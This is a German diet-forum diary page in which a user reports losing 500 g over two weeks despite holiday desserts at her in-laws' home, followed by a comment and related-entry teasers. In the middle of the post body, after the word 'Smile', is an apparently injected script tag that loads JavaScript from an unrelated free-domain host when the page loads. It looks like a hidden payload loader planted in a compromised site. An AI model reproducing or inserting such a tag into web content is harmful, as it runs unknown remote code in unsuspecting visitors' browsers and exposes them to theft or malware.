Zum Inhalt springen

Sie sind hier

26.08.2014 - die letzte woche gut überstanden

0  0
Am von im Ernährungstagebuch geschrieben

also ich war in der letzten woche gemeinsam mit meinem schatz bei den schwiegereltern und die mama hat gut gekocht und eigentlich hab ich nicht sonderlich auf inhaltsstoffe geschaut nur auf die mengen  die ich verzehrt habe.

ich hab auch oft in form von eis und nachspeisen wie paradiescreme mit beeren gesündigt....

ich dachte wenn ich daheim auf meine waage stelle werde ich es bereuen und müsste einen rückschlag in kauf nehmen aber nein sogar 500g weg. sind zwar "nur" 500g in zwei wochen aber wenn ich bedenke was ich so gegessen hab, bin ich beruhigt

ich bin jetzt aber wieder fern von muttis braten und omas kuchen und bin hochmotiviert, dass ich in dieser woche viel schaffen werde.

Smile

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Die Wunderdiät:
Nach dem Frühstück aufstehen,
das Mittagessen auf das Abendbrot verschieben
und vor dem Abendbrot ins Bett gehen.

Vorheriger Ernährungstagebuch-Eintrag
Bild von Schokomaus09 :( ich bekomms nicht hin
Nächster Ernährungstagebuch-Eintrag
Bild von Tabbimaus Tabbimaus im Shoppingrausch...

Kommentare

Bild des Benutzers Emma09
0  0

wenn man von all diesem entfernt ist - muß man auch nicht sündigen I-m so happy und kann Ziel weiterhin verfolgen Biggrin

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Ziel für den Abnehmplan von LiLaLillyfee: Damit es keine inneren Ausreden für mich gibt, werde ich in meinem Tagebuch jeden Samstag dokumentieren wieviel ich angenommen habe (oder auch nicht). Ich hoffe das hilft mir dran zu bleiben um jede...
Eintrag in ein Ernährungstagebuch von kortes: S​eit dem Fastenende ist an den Wochenenden immer was los gewesen und ich hatte an den 4 Wochenendtagen immer zwischen 2000 und 3000 Kal. pro Tag. Dass es in der Woche dann noch reichlich Anstrengung...
Eintrag in ein Ernährungstagebuch von kortes: ...minus 1,8 Kg. Da war ich heute morgen echt platt. Gut ich habe es schon im Laufe der Woche gemerkt, dass da richtig was geht. Meine neuen Hosen wurden mir weit, die Blusen schlabbern und ich bin...
Eintrag in ein Ernährungstagebuch von Candy2001: So, ich habe mich jetzt 4 Wochen fast perfekt an mein Intermittierendes Fasten gehalten. Gewichtstechnisch stehe ich jetzt bei 65,7 Kilo - also fast nicht abgenommen. Allerdings sagen mir Leute, dass...
Eintrag in ein Ernährungstagebuch von Binchen: Ich will es schaffen diese Woche 1 kg abzunehmen. Dafür werde ich mich um Rehasport kümmern sofern ich nicht wieder ins Krankenhaus muss.
Eintrag in ein Ernährungstagebuch von Isabelle11: Heute hatte ich ein paar Sachen, die normalerweise nicht in meine Ernährung passen, aber ich war bis jetzt seit ich am 12.06. den Sport begonnen habe so diszipliniert - da hat ein kleiner Windbeutel...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst